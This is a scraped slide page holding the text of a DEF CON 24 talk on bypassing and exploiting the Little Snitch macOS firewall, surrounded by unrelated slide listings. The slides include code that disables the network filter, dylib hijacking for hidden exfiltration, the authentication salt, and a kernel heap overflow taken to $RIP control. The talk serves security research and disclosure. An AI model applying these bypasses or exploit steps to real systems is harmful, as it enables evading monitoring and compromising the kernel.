THIS IS CYBER SECURITY NOTES USED IN CLASS ON VARIOUS TOPICS USED IN CYBERSEC...
byMelissaGblinwon
 
PDF
Unser Jahresrückblick – MarvelClient in 2025
bypanagenda
 
PDF
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
PDF
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
PPTX
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
PPTX
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PPTX
Data Privacy and Protection: Safeguarding Information in a Connected World
byYasir Naveed Riaz
 
PDF
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
PDF
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
GPUS and How to Program Them by Manya Bansal
byScyllaDB
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
December Patch Tuesday
byIvanti
 
THIS IS CYBER SECURITY NOTES USED IN CLASS ON VARIOUS TOPICS USED IN CYBERSEC...
byMelissaGblinwon
 
Unser Jahresrückblick – MarvelClient in 2025
bypanagenda
 
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
Data Privacy and Protection: Safeguarding Information in a Connected World
byYasir Naveed Riaz
 
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 

DEF CON 24 - Patrick Wardle - 99 problems little snitch

  • 1.
    @patrickwardle I got 99Problems, but 
 Little Snitch ain’t one!
  • 2.
    WHOIS “leverages the bestcombination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby
  • 3.
    making little snitchour b!tch OUTLINE understanding bypassing reversing owning
  • 4.
  • 5.
    the de-facto hostfirewall for macOS LITTLE SNITCH "Little Snitch intercepts connection attempts, and lets you decide how to proceed." -www.obdev.atlittle snitch alert in the news (red team vs. palantir)
  • 6.
    the puzzle pieces LITTLESNITCH COMPONENTS ring-0 ring-3 (root session) LittleSnitch.kext Little Snitch Daemon Little Snitch Configuration Little Snitch Agent ›network, process monitoring 'authentication'› ›rules management ›rules management preferences› ›ui alerts ring-3 (user/UI session) ring-0 bug
  • 7.
  • 8.
    abusing system rulesto talk to iCloud LITTLE SNITCH BYPASS 0X1 iCloud little snitch's iCloud rule o rly!?...yes! un-deletable system rule: "anybody can talk to iCloud"
  • 9.
    abusing 'proc-level' trust LITTLESNITCH BYPASS 0X2 $ python dylibHijackScanner.py 
 GPG Keychain is vulnerable (weak/rpath'd dylib) 'weak dylib': '/Libmacgpg.framework/Versions/B/Libmacgpg' 'LC_RPATH': '/Applications/GPG Keychain.app/Contents/Frameworks' undetected exfil/C&C "Using Process Infection to Bypass Windows Software Firewalls" -Phrack, '04 gpg keychain; allow all dylib hijack 'injection'
  • 10.
    stop the networkfilter LITTLE SNITCH BYPASS 0X3 ring-0 method 0xB disable: 0x0 ring-3 LittleSnitch.kext //connect & authenticate to kext // ->see later slides for details :) //input // ->set to 0x0 to disable uint64_t input = 0x0; //stop network filter IOConnectCallScalarMethod(connectPort, 0xB, &input, 0x1, NULL, NULL); 'invisible' to UI //input // ->disable is 0x0 if( (0xB == method) && (0x0 == scalarInput) ) { //disable filter! } 'stop network filter'
  • 11.
    REVERSING LITTLE SNITCH pokingon kext's interfaces
  • 12.
  • 13.
    XNU's device driverenv I/O KIT self-contained, runtime environment implemented in C++ object-oriented› "Mac OS X and iOS Internals"
 "OS X and iOS Kernel Programming" 
 "IOKit Fundamentals" (apple.com) #include <IOKit/IOLib.h> #define super IOService OSDefineMetaClassAndStructors(com_osxkernel_driver_IOKitTest, IOService) bool com_osxkernel_driver_IOKitTest::init(OSDictionary* dict) { bool res = super::init(dict); IOLog("IOKitTest::initn"); return res; } IOService* com_osxkernel_driver_IOKitTest::probe(IOService* provider, SInt32* score) { IOService *res = super::probe(provider, score); IOLog("IOKitTest::proben"); return res; } bool com_osxkernel_driver_IOKitTest::start (IOService *provider) { bool res = super::start(provider); IOLog("IOKitTest::startn"); return res; } ... $ sudo kextload IOKitTest.kext 
 $ grep IOKitTest /var/log/system.log users-Mac kernel[0]: IOKitTest::init users-Mac kernel[0]: IOKitTest::probe users-Mac kernel[0]: IOKitTest::start load kext; output i/o kit resources › › › sample i/o kit driver
  • 14.
    'inter-ring' comms I/O KIT serialport driver open(/dev/xxx) read() / write() other i/o kit drivers find driver; then: I/O Kit Framework read/write 'properties' send control requests "The user-space API though which a process communicates with a kernel driver is provided by a framework known as 'IOKit.framework'" 
 -OS X and iOS Kernel Programming today's focus or
  • 15.
    invoking driver methods I/OKIT //look up method, invoke super externalMethod(selector, ...) ring-0 //check params, invoke method super::externalMethod(..., dispatch, ...) } selector (method index) ›dispatch = methods[selector] dispatch (method) method_0(); method_1(); method_2(); ring-3
  • 16.
    ex; driver interface I/OKIT const IOExternalMethodDispatch com_osxkernel_driver_IOKitTestUserClient::sMethods[kTestUserClientMethodCount] = { //kTestUserClientStartTimer(void); {sStartTimer, 0, 0, 0, 0}, //kTestUserClientDelayForTime(const TimerValue* timerValue); {sDelayForTime, 0, sizeof(TimerValue), 0, 0}, }; IOReturn com_osxkernel_driver_IOKitTestUserClient::externalMethod (uint32_t selector, IOExternalMethodArguments* arguments, IOExternalMethodDispatch* dispatch, OSObject* target, void* reference){ 
 //ensure the requested control selector is within range if(selector >= kTestUserClientMethodCount) return kIOReturnUnsupported; dispatch = (IOExternalMethodDispatch*)&sMethods[selector]; target = this; reference = NULL; return super::externalMethod(selector, arguments, dispatch, target, reference); } struct IOExternalMethodDispatch { IOExternalMethodAction function; uint32_t checkScalarInputCount; uint32_t checkStructureInputSize; uint32_t checkScalarOutputCount; uint32_t checkStructureOutputSize; }; describes methods/args entry point, user-mode requests forward request to super, 
 which routes to method IOExternalMethodDispatch struct i/o kit driver interface
  • 17.
    ex; user 'client' I/OKIT mach_port_t masterPort = 0; io_service_t service = 0;
 
 //get master port IOMasterPort(MACH_PORT_NULL, &masterPort); //get matching service service = IOServiceGetMatchingService(masterPort, IOServiceMatching("com_osxkernel_driver_IOKitTest")); io_connect_t driverConnection = 0; //open connection IOServiceOpen(service, mach_task_self(), 0, &driverConnection); find driver open/create connection struct TimerValue { uint64_t time, uint64_t timebase; }; struct TimerValue timerValue = { .time=500, .timebase=0 }; //make request to driver
 IOConnectCallStructMethod(driverConnection, kTestUserClientDelayForTime, timerValue, sizeof(TimerValue), NULL, 0); kern_return_t IOConnectCallStructMethod( mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt ); send request IOKitLib.h IOConnectCallStructMethod function"OS X and iOS Kernel Programming" 
 (chapter 5) selector
  • 18.
    lea rcx, aDjd4e; "DJD4E=" mov edx, 0AE4C415Dh ;string decoding omitted lea rsi, [rbp+symbol] mov rdi, 0FFFFFFFFFFFFFFFEh call _dlsym mov r10, rax mov cs:qword_10006E3C8, r10 test r10, r10 jz short loc_100025EAE lea rdi, [rbp+var_30] lea rdx, [rbp+var_2B8] lea rcx, [rbp+var_2D8] mov esi, 4 xor r8d, r8d xor r9d, r9d call r10 ; qword_10006E3C8 test eax, eax jnz short loc_100025EB7 lea rcx, aAec246 ; "AEC246" mov edx, 0AE4C415Dh strDecode: movzx esi, byte ptr [rax+rcx] add esi, 0Fh mov rdi, rsi imul rdi, rdx shr rdi, 26h imul edi, 5Eh sub esi, edi add esi, 20h mov [rbp+rax+symbol], sil inc rax cmp rax, 6 jnz short strDecode mov [rbp+var_2A], 0 lea rsi, [rbp+symbol] mov rdi, 0FFFFFFFFFFFFFFFEh call _dlsym mov r8, rax mov cs:qword_10006E068, r8 mov edi, 1Fh mov esi, 0FFFFFFFFh xor edx, edx xor ecx, ecx call r8 ; qword_10006E068 test eax, eax jz short continue gtfo reversers! #not LITTLE SNITCH ANTI-ANALYSIS #define PT_DENY_ATTACH 0x1F //decode 'ptrace' char* symbol = strDecode("AEC246", 0x0AE4C415D); //get address of ptrace() *(void **)(&fpPTRACE) = dlsym(handle, symbol); //invoke ptrace w/ 'PT_DENY_ATTACH' if(0 != fpPTRACE(PT_DENY_ATTACH, -1, 0, 0)) { //debugger detected // ->exit! } #define P_TRACED 0x00000800 //decode 'sysctl' char* symbol = strDecode("DJD4E=", 0x0AE4C415D); //get address of sysctl() *(void **)(&fpSYSCTL) = dlsym(handle, symbol); //invoke sysctl() to get current process info // ->mib: KERN_PROC, KERN_PROC_PID, and pid fpSYSCTL(mib, 4, &info, &size, NULL, 0); //check if process is being traced if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //debugger detected // ->exit! } # ps aux | grep "Little Snitch" root 61 Little Snitch Daemon # lldb -p 61 (lldb) process attach --pid 61 error: attach failed: lost connection ptrace(PT_DENY_ATTACH) sysclt()/P_TRACED attach? nope!
  • 19.
    service: 'at_obdev_LSNKE' FIND/CONNECT TOLITTLE SNITCH'S KEXT char -[m097e1b4e m44e2ed6c](void * self, void * _cmd) { ... sub_10003579a(0x7789); } int sub_10003579a(int arg0) { r15 = arg0; rbx = IOMasterPort(0x0, 0x0);
 r14 = IOServiceGetMatchingService(0x0, IOServiceNameMatching("at_obdev_LSNKE")); r15 = IOServiceOpen(r14, *_mach_task_self_, r15, 0x10006ed58); mach_port_t masterPort = 0; io_service_t serviceObject = 0; io_connect_t connectPort = 0; IOMasterPort(MACH_PORT_NULL, &masterPort); serviceObject = IOServiceGetMatchingService(masterPort, IOServiceMatching("at_obdev_LSNKE")); IOServiceOpen(serviceObject, mach_task_self(), 0x7789, &connectPort); ls' daemon hopper decompilation $ ./connect2LS got master port: 0xb03 got matching service (at_obdev_LSNKE): 0xf03 opened service (0x7789): 0x1003 custom 'connection' code connected!
  • 20.
    'reachable' kernel methods ENUMERATINGAVAILABLE INTERFACES class_externalMethod proc push rbp mov rbp, rsp cmp esi, 16h ja short callSuper mov eax, esi lea rax, [rax+rax*2] lea rcx, IORegistryDescriptorC3::sMethods lea rcx, [rcx+rax*8] ... callSuper: mov rax, cs:IOUserClient_vTable pop rbp jmp qword ptr [rax+860h] IOKitTestUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments* arguments, IOExternalMethodDispatch* dispatch, OSObject* target, void* reference) if(selector <= 16) dispatch = (IOExternalMethodDispatch*)&sMethods[selector]; return super::externalMethod(selector, arguments, dispatch, target, reference); IORegistryDescriptorC3_sMethods IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED832h, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED846h, 0, 0, 0, 83Ch> IOExternalMethodDispatch <0FFFFFF7FA13ED89Ah, 0, 0Ch, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED8D2h, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED944h, 0, 10h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED95Ah, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED97Eh, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED9CEh, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDA84h, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDAC6h, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13EDBBAh, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13EDBCEh, 0, 0, 0, 80h> IOExternalMethodDispatch <0FFFFFF7FA13EDBFAh, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC0Eh, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC22h, 0, 0Ch, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC36h, 0, 10h, 0, 18h> IOExternalMethodDispatch <0FFFFFF7FA13EDC4Ah, 0, 0, 0, 2Ch> IOExternalMethodDispatch <0FFFFFF7FA13EDC86h, 0, 54h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDCC2h, 1, 0, 0, 0> class methods ('sMethods') method #7 struct IOExternalMethodDispatch { IOExternalMethodAction function; uint32_t checkScalarInputCount; uint32_t checkStructureInputSize; uint32_t checkScalarOutputCount; uint32_t checkStructureOutputSize; }; IOExternalMethodDispatch struct pseudo code ls' externalMethod() IOUserClient.h
  • 21.
    it haz bug! SAYHELLO TO METHOD 0X7 IOExternalMethodDispatch 
 <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> 0XFFFFFF7F86FED8FA method_0x7 proc ... mov rax, [rdi] ; this pointer, vTable mov rax, [rax+988h] ; method mov rsi, rdx jmp rax +0x0 __const:FFFFFF7FA13F5A30 vTable ... ... +0x988 __const:FFFFFF7FA13F63B8 dq offset sub_FFFFFF7FA13EABB2 0x63B8 - 0x5A30 = 0x988 sub_FFFFFF7FA13EABB2 proc mov rbx, rsi mov rdi, [rbx+30h] ; user-mode (ls) struct call sub_FFFFFF7FA13E76BC sub_FFFFFF7FA13E76BC proc near call sub_FFFFFF7FA13E76F7 sub_FFFFFF7FA13E76F7 proc near mov rbx, rdi ; user-mode struct mov rdi, [rbx+8] ; size test rdi, rdi jz short leave ; invalid size cmp qword ptr [rbx], 0 jz short leave mov rsi, cs:allocTag call _OSMalloc ; malloc ... mov rdi, [rbx] ; in buffer mov rdx, [rbx+8] ; size mov rsi, rax ; out buffer (just alloc'd) call _copyin struct lsStruct { void* buffer size_t size; ... }; sub_FFFFFF7FA13E76F7(struct lsStruct* ls) { if( (0 == ls->size) || (NULL == ls->buffer) ) goto bail; kBuffer = OSMalloc(ls->size, tag); if(NULL != kBuffer) copyin(ls->buffer, kBuffer, ls->size); method 0x7 'call thru' malloc/copy (pseudo-code) malloc/copy (IDA)
  • 22.
    32bit size matters... KERNEL BUG? void*OSMalloc( uint32_t size, ...); libkern/libkern/OSMalloc.h int copyin(..., vm_size_t nbytes ); osfmk/x86_64/copyio.c offset 15 ... 8 7 6 5 4 3 2 1 0 value 1 0 0 0 0 0 0 0 2 64bit 64bit value: 0x100000002 32bit value: 0x100000002 struct lsStruct ls; ls.buffer = <some user addr>; ls.size = 0x100000002; //malloc & copy kBuffer = OSMalloc(0x00000002, tag); if(NULL != kBuffer) copyin(ls->buffer, kBuffer, 0x100000002); vs. kernel heap heap buffer 
 [size: 2 bytes] rest of heap.... heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 vm_size_t is 64bits!
  • 23.
  • 24.
    gotta 'authenticate' ISSUE 0X1 IOExternalMethodDispatch<0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> method_0x7 proc cmp byte ptr [rdi+0E9h], 0 jz short leave ;buggy code IOExternalMethodDispatch <0FFFFFF7FA13ED944h, 0, 10h, 0, 0> method_0x8 proc MD5Update(var_90, r14 + 0xea, 0x10); MD5Update(var_90, 0x8E6A3FA34C4F4B23, 0x10); MD5Final(0x0FC5C35FAA776E256, var_90); do{ rdx = rcx; rcx = *(int8_t *)(rbp + rax + 0xffffffffffffff60); rcx = rcx ^ *(int8_t *)(rbx + rax); rcx = rcx & 0xff | rdx; rax = rax + 0x1; } while(rax != 0x10); if (rcx == 0x0) *(r14 + 0xe9) = 0x1; connect to Little Snitch driver ('at_obdev_LSNKE') invoke method 0x4 returns 0x10 'random' bytes hash this data, with embedded salt (x56xe2x76xa7...) invoke method 0x8 to with hash to authenticate unsigned char gSalt[] = "x56xe2x76xa7xfax35x5cxfc x23x4bx4fx4cxa3x3fx6ax8e"; 0x0? leave :( sets flag :) authenticated; can (now) reach buggy code!
  • 25.
    the bug isn'texploitable!? ISSUE 0X2 kBuffer = OSMalloc(0x00000002, tag); copyin(ls->buffer, kBuffer, 0x100000002); heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 [ untouched ] only two bytes are copied!? _bcopy(const void *, void *, vm_size_t); /* * Copyin/out from user/kernel * rdi:source address * rsi:destination address * rdx:byte count */ Entry(_bcopy) // TODO: // think about 32 bit or 64 bit byte count movl %edx,%ecx shrl $3,%ecx x86_64/locore.s submit bug report to Apple (2013) Entry(_bcopy) xchgq %rdi, %rsi movl %rdx,%rcx shrl $3,%rcx fixed! (OS X 10.11, 2015) $EDX/$ECX byte count (not $RDX/$RCX) 32bit :(
  • 26.
    mapped page unmapped page copyin(ls->buffer, kBuffer,ls->size); controlling the heap copy ISSUE 0X3 heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 panic :( Entry(_bcopy)
 RECOVERY_SECTION RECOVER(_bcopy_fail) rep movsq movl %edx, %ecx andl $7, %ecx RECOVERY_SECTION RECOVER(_bcopy_fail) _bcopy_fail: movl $(EFAULT),%eax ret 'fault toleranance' 0x100FFC 0x101000 struct lsStruct ls; ls.buffer = 0x100FFC ls.size = 0x100000002; heap buffer 
 [size: 2 bytes] rest of heap.... ring-0 ring-3 control exact # of bytes copied into buffer ls struct 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ? ? ?
  • 27.
    vTable hijacking ($RIP) SUCCESS!heap buffer 
 [size: 2 bytes] C++ object [0xffffff8029a27e00] 0x41 0x41 0x4141414141414141 allocation size bytes copied # of bytes copied controls: + + attacker controlled vTable pointer (lldb) x/4xg 0xffffff8029a27e00 0xffffff8029a27e00: 0x4141414141414141 0x4141414141414141 0xffffff8029a27e10: 0x4141414141414141 0x4141414141414141 (lldb) reg read $rax rax = 0x4141414141414141 (lldb) x/i $rip -> 0xffffff8020b99fb3: ff 50 20 callq *0x20(%rax) control of $RIP :)
  • 28.
    reliably exploiting amacOS heap overflow WEAPONIZING "Attacking the XNU Kernel in El Capitan" -luca todesco controlling heap layout
 
 bypassing kALSR bypassing smap/smep payloads (!SIP, etc) "Hacking from iOS 8 to iOS 9" 
 -team pangu "Shooting the OS X El Capitan Kernel Like a Sniper" -liang chen/qidan he } get root 'bring' & load buggy kext exploit & disable SIP SIP 'bypass' (buggy) kext still validly signed!
  • 29.
  • 30.
    at least theyfixed it... VENDOR RESPONSE : mov rbx, rdi ; user struct mov edi, [rbx+8] ; size call _OSMalloc mov rdi, [rbx] ; in buffer mov edx, [rbx+8] ; size mov rsi, rax ; out buffer call _copyin fixed the bug
 
 downplayed the bug didn't assign a CVE no credit (i'm ok with that) maybe talking about my exploit!? consistent size users won't patch
  • 31.
    free security tools& malware samples OBJECTIVE-SEE(.COM) KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr RansomWhere?
  • 32.
    contact me anytime :) QUESTIONS & ANSWERS patrick@synack.com @patrickwardle "Is it crazy how saying sentences backwards creates backwards sentences saying how crazy it is?" -Have_One, reddit.com final thought ;)
  • 33.
    mahalo :) CREDITS - FLATICON.COM -THEZOOOM.COM - ICONMONSTR.COM - HTTP://WIRDOU.COM/2012/02/04/IS-THAT-BAD-DOCTOR/ - HTTP://TH07.DEVIANTART.NET/FS70/PRE/F/ 2010/206/4/4/441488BCC359B59BE409CA02F863E843.JPG 
 
 - "IOS KERNEL EXPLOITATION --- IOKIT EDITION ---" -STEFANO ESSER - "REVISITING MAC OS X KERNEL ROOTKITS!" -PEDRO VILAÇA - "FIND YOUR OWN IOS KERNEL BUG" -XU HAO/XIABO CHEN - "ATTACKING THE XNU KERNEL IN EL CAPITAN" -LUCA TODESCO - "HACKING FROM IOS 8 TO IOS 9" -TEAM PANGU - "SHOOTING THE OS X EL CAPITAN KERNEL LIKE A SNIPER" -LIANG CHEN/QIDAN HE - "OPTIMIZED FUZZING IOKIT IN IOS" -LEI LONG - "MAC OS X AND IOS INTERNALS" -JONATHAN LEVIN - "OS X AND IOS KERNEL PROGRAMMING" -OLE HALVORSEN/DOUGLAS CLARKE images resources